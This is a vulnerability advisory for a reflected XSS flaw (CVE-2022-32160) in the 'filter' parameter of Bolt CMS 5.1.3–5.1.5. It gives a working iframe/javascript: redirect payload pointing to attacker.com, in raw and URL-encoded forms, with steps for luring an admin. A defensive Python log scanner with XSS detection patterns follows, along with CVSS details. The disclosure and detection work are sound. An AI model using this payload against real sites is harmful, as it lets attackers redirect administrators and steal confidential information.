CVE-2022-32160

Date: May 31, 2022

Overview

Bolt v5.1.3 and v5.1.5 are vulnerable to reflected XSS because the ‘filter’ parameter is not sanitized, which allows malicious JavaScript to be injected into the page. An attacker can redirect Admins to malicious websites or steal confidential information.

Details

Bolt v5.1.3 and v5.1.5 are vulnerable to reflected XSS.

PoC Details

Log in to the application as a low-privileged user. Enter the following payload into the search bar.

Press Enter. You will be redirected to “http://attacker.com/”. Copy this URL and send it to an Admin. The Admin will be redirected as well.

http://bolt_app.com/bolt/?filter=%3Ciframe+src%3D%22javascript%3Awindow.top.location.replace%28%27http%3A%2F%2Fattacker.com%2F%27%29%22%3B%3E%3C%2Fiframe%3E

PoC Code

<iframe src="javascript:window.top.location.replace('http://attacker.com/')";></iframe> 

Affected Environments

Bolt CMS versions 5.1.3 through 5.1.5

Prevention

There is no fix yet.
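With no fixed version to upgrade to, requests that carry markup in the ‘filter’ parameter can at least be found in web server logs. The following is an added example, not code from Bolt or from this advisory: it assumes combined-format access logs and a back end served under /bolt, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markup or script-scheme indicators that have no place in a listing filter.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|\bon\w+\s*=", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_filter(url):
    """Return the decoded 'filter' value if it carries markup, else None."""
    query = urlsplit(url).query
    # parse_qs percent-decodes the value and turns '+' into a space,
    # so the check runs on the text the application would reflect.
    for value in parse_qs(query, keep_blank_values=True).get("filter", []):
        if SUSPICIOUS.search(value):
            return value
    return None

def scan_access_log(lines, prefix="/bolt"):
    """Return (line_no, decoded_value) for requests under prefix with a suspicious filter."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        target = m.group(1)
        if not urlsplit(target).path.startswith(prefix):
            continue  # assumption: only the /bolt back end is in scope
        value = suspicious_filter(target)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/May/2022:10:00:01 +0000] "GET /bolt/?filter=news HTTP/1.1" 200 5120',
    '203.0.113.7 - - [31/May/2022:10:00:09 +0000] "GET /bolt/?filter=%3Ciframe+src%3D%22javascript%3Awindow.top.location.replace%28%27http%3A%2F%2Fattacker.com%2F%27%29%22%3B%3E%3C%2Fiframe%3E HTTP/1.1" 200 5344',
    '198.51.100.4 - - [31/May/2022:10:02:30 +0000] "GET /page/about?filter=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, value in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious filter value: {value!r}")
```

The same pattern can back a reverse-proxy or WAF rule that rejects such requests before they reach the application.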

Language: PHP

Good to know:

Cross-Site Scripting (XSS)

CWE-79

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None